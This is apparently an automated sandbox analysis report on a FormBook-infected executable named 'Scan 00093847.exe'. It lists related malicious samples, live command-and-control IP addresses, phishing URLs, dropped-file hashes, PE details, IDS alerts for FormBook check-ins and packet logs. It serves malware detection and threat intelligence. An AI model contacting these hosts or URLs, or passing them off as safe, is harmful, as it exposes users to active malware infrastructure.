                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 13.248.169.48
                                          INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                          • 13.248.169.48
                                          www.complexity.pubTF1--90.AE.473- ARCA.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.127
                                          PJS-4021339 IND.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.127
                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 217.160.0.127
                                          Tender_24910.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.127
                                          Atlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.127
                                          SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exeGet hashmaliciousFormBookBrowse
                                          • 217.160.0.127
                                          dns.ladipage.comz11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                                          • 13.228.81.39
                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 13.228.81.39
                                          DN.exeGet hashmaliciousFormBookBrowse
                                          • 18.139.62.226
                                          https://www.newbalancestore.asia/nb530.nh?utm_source=saleGet hashmaliciousUnknownBrowse
                                          • 13.228.81.39
                                          DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                                          • 18.139.62.226
                                          Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                                          • 13.228.81.39
                                          INV90097.exeGet hashmaliciousFormBookBrowse
                                          • 54.179.173.60
                                          PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                                          • 54.179.173.60
                                          Order 81307529516.LZ.exeGet hashmaliciousFormBookBrowse
                                          • 54.179.173.60
                                          Proforma_Invoice.pif.exeGet hashmaliciousFormBookBrowse
                                          • 13.228.81.39
                                          www.kryto.topREQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 162.0.213.94
                                          www.mbwd.storerRFQ.bat.exeGet hashmaliciousFormBookBrowse
                                          • 103.42.108.46
                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 103.42.108.46

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          THORDC-ASISREQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                          • 82.221.128.183
                                          botx.x86.elfGet hashmaliciousMiraiBrowse
                                          • 82.221.214.240
                                          waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          msi.dll.dllGet hashmaliciousUnknownBrowse
                                          • 82.221.129.24
                                          4Y26u3rWN6.rtfGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xlsGet hashmaliciousRemcosBrowse
                                          • 192.253.251.227
                                          createdthingstobefrankwithmeeverywhere.gIF.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 192.253.251.227
                                          AMAZON-02USuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                          • 3.64.163.50
                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                          • 3.64.163.50
                                          TTMGv2XOAd.exeGet hashmaliciousUnknownBrowse
                                          • 35.164.78.200
                                          McbdvFaVqC.exeGet hashmaliciousUnknownBrowse
                                          • 35.164.78.200
                                          DOC-66642820.pdfGet hashmaliciousUnknownBrowse
                                          • 18.239.69.48
                                          9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                          • 35.177.100.181
                                          9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                          • 52.222.236.71
                                          qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          https://connect.nrpa.org/discussion/deputy-director-need-your-help-with-the-rest#bm5d45b988-9c01-4edc-8280-0e45b7ae3f64Get hashmaliciousUnknownBrowse
                                          • 18.245.46.95
                                          ACPCAPlay_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousPhisherBrowse
                                          • 162.0.217.108
                                          Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 162.0.217.108
                                          Play_VM-NowMarge.mcintireAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 162.0.217.108
                                          Factura de proforma.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 162.0.213.72
                                          Quote #011698.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.213.94
                                          https://www.google.com/url?q=https://google.com/url?hl%3Den%26q%3Dhttps://google.com/url?q%3D4xNZLlTBeMrz3JgT2S2x%26rct%3Duxx6lWWQSQg3lz6tBGEQ%26sa%3Dt%26esrc%3DLnMkARnwEn0HQZmQHxxK%26source%3D%26cd%3DCFK8mnhX1pEg7TmGNG8P%26cad%3DnNq1ozyXGrC1kDZTqknt%26ved%3DYxsBoVntlMlmOm9lZwVR%26uact%3D%26url%3Damp%252Fsushanta.com%252F21%252F&source=gmail&ust=1725491985982000&usg=AOvVaw2OjIR7ELr3F4rLhFIHiJIH#OvyuiE-SUREMAYYcmVpbmEuYXZpbGFAc3RndXNhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                          • 162.0.209.83
                                          http://jan47nfhc.3utilities.com/#a7oOTE-SUREJACKam9obi50aGlncGluQGNoZXJva2VlYnJpY2suY29tGet hashmaliciousUnknownBrowse
                                          • 162.0.209.83
                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.213.94
                                          709827261526152615.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.213.72
                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                          • 162.0.213.94
                                          AMAZON-02USuB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                          • 3.64.163.50
                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                          • 3.64.163.50
                                          TTMGv2XOAd.exeGet hashmaliciousUnknownBrowse
                                          • 35.164.78.200
                                          McbdvFaVqC.exeGet hashmaliciousUnknownBrowse
                                          • 35.164.78.200
                                          DOC-66642820.pdfGet hashmaliciousUnknownBrowse
                                          • 18.239.69.48
                                          9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                          • 35.177.100.181
                                          9Zu52GuKZE.exeGet hashmaliciousUnknownBrowse
                                          • 52.222.236.71
                                          qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                          • 52.34.198.229
                                          https://connect.nrpa.org/discussion/deputy-director-need-your-help-with-the-rest#bm5d45b988-9c01-4edc-8280-0e45b7ae3f64Get hashmaliciousUnknownBrowse
                                          • 18.245.46.95

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan 00093847.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\Scan 00093847.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1216
                                          Entropy (8bit):5.34331486778365
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                          Malicious:true
                                          Reputation:high, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1172
                                          Entropy (8bit):5.340856735080657
                                          Encrypted:false
                                          SSDEEP:24:3MWSKco4KmBs4RP8jKbmC6moUebIKo+mZ9t7J0gt/NKIl9r+q:8WSU4y4RYymaoUeW+mZ9tK8ND3
                                          MD5:127FA3C1E54F5A8BCBB70A3F3DD5A6F8
                                          SHA1:D4CF69F781047FB97E0BAC7D7F2C1ADB1FA9381A
                                          SHA-256:6B05148F8A15293F166CA5926E3222253F75511A29B28C48F5569A3D942098EB
                                          SHA-512:9D817D663A2DCAFE03AD8331B39674D92DB74C6421BB812F7CC1BD2FF079462C8D4A4ED1F0FF4247D4DEAA85CF580AA597709AD58EB1E10C740697468077565C
                                          Malicious:false
                                          Reputation:low
                                          Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                          C:\Users\user\AppData\Local\Temp\3h8t0-08

                                          Download File
                                          Process:C:\Windows\SysWOW64\setupugc.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ydnz2wr.xxj.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gajabb2l.w0a.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rntnoz1j.dep.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkrtf5ih.3yq.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.906182803463929
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Scan 00093847.exe
                                          File size:798'720 bytes
                                          MD5:7c580b0bf94b5edb15717136670a8092
                                          SHA1:92393d585cfc170824a8184e68d2724a42b68835
                                          SHA256:9d606ced77696b89acfe57d52547936b3b36f8bce44fbde3efa787e693f82637
                                          SHA512:7e28c353365cfaa7b705e67ed4ef61689301c98c9b28af9353b853fc3801109e5124bc1d0c580b486af2157a7ad5cfe5e314c75079e4e55bf09bccdd9aeb72d4
                                          SSDEEP:24576:KUobyD4+OlsfgTEoFMeDcvypD2hOLYAwpM8f:rh4tip6n8OLYX
                                          TLSH:790512103768CB2BD9AD8AFA54B5A1014379EE674203FB085F9134EA1E73BD30595F8B
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=................0..&..........f8... ...`....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x4c3866
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x97CE3D1D [Thu Sep 15 17:27:57 2050 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          loop 00007F7300521B31h

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc38110x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x5ac.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xbd8600x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xc24640xc2600fd0181527ad07faea58bfe59d327b47fFalse0.931572799437299data7.912332332178285IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xc60000x5ac0x60040b6773b22027034c5402bd0cebe6914False0.4212239583333333data4.1155869895173245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xc80000xc0x200604cd57352415c705127d856749ca575False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xc60900x31cdata0.435929648241206
                                          RT_MANIFEST0xc63bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-09-07T21:43:36.228581+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45622882.221.128.18380TCP
                                          2024-09-07T21:44:00.021494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456230217.160.0.12780TCP
                                          2024-09-07T21:44:02.597060+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456231217.160.0.12780TCP
                                          2024-09-07T21:44:05.121163+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456232217.160.0.12780TCP
                                          2024-09-07T21:44:07.694615+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.456233217.160.0.12780TCP
                                          2024-09-07T21:44:13.635184+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45623485.159.66.9380TCP
                                          2024-09-07T21:44:16.178192+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45623585.159.66.9380TCP
                                          2024-09-07T21:44:18.855613+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45623685.159.66.9380TCP
                                          2024-09-07T21:44:21.251583+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45623785.159.66.9380TCP
                                          2024-09-07T21:44:27.653098+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45623818.139.62.22680TCP
                                          2024-09-07T21:44:30.171638+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45623918.139.62.22680TCP
                                          2024-09-07T21:44:32.745379+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45624018.139.62.22680TCP
                                          2024-09-07T21:44:35.274281+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45624118.139.62.22680TCP
                                          2024-09-07T21:44:41.381314+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456242162.0.213.9480TCP
                                          2024-09-07T21:44:43.921266+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456243162.0.213.9480TCP
                                          2024-09-07T21:44:46.507584+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456244162.0.213.9480TCP
                                          2024-09-07T21:44:49.014006+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.456245162.0.213.9480TCP
                                          2024-09-07T21:44:55.044638+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4562463.33.130.19080TCP
                                          2024-09-07T21:44:57.590729+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4562473.33.130.19080TCP
                                          2024-09-07T21:45:00.152606+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4562483.33.130.19080TCP
                                          2024-09-07T21:45:02.701525+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4562493.33.130.19080TCP
                                          2024-09-07T21:45:08.215628+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45625013.248.169.4880TCP
                                          2024-09-07T21:45:11.261505+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45625113.248.169.4880TCP
                                          2024-09-07T21:45:14.263668+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45625213.248.169.4880TCP
                                          2024-09-07T21:45:16.809766+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45625313.248.169.4880TCP
                                          2024-09-07T21:45:23.571419+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456254185.134.245.11380TCP
                                          2024-09-07T21:45:26.061528+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456255185.134.245.11380TCP
                                          2024-09-07T21:45:28.592743+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456256185.134.245.11380TCP
                                          2024-09-07T21:45:31.255864+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.456257185.134.245.11380TCP
                                          2024-09-07T21:45:37.497476+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456258103.42.108.4680TCP
                                          2024-09-07T21:45:40.787323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456259103.42.108.4680TCP
                                          2024-09-07T21:45:43.323564+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.456260103.42.108.4680TCP
                                          2024-09-07T21:45:45.914448+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.456261103.42.108.4680TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 7, 2024 21:43:35.539413929 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:35.544286966 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:35.544363976 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:35.553037882 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:35.558042049 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.228411913 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.228441000 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.228454113 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.228580952 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.229028940 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.229041100 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.229235888 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.229847908 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.229860067 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.229871035 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.229892015 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.229922056 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.230442047 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.230453968 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.230467081 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:36.230494976 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.230513096 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.234492064 CEST5622880192.168.2.482.221.128.183
                                          Sep 7, 2024 21:43:36.239530087 CEST805622882.221.128.183192.168.2.4
                                          Sep 7, 2024 21:43:59.373727083 CEST5623080192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:43:59.378684044 CEST8056230217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:43:59.378777981 CEST5623080192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:43:59.388808012 CEST5623080192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:43:59.393712044 CEST8056230217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:00.021413088 CEST8056230217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:00.021436930 CEST8056230217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:00.021493912 CEST5623080192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:00.895159006 CEST5623080192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:01.914086103 CEST5623180192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:01.920274019 CEST8056231217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:01.920383930 CEST5623180192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:01.931091070 CEST5623180192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:01.936124086 CEST8056231217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:02.596792936 CEST8056231217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:02.596959114 CEST8056231217.160.0.127192.168.2.4
                                          Sep 7, 2024 21:44:02.597059965 CEST5623180192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:03.442064047 CEST5623180192.168.2.4217.160.0.127
                                          Sep 7, 2024 21:44:04.461030960 CEST5623280192.168.2.4217.160.0.127
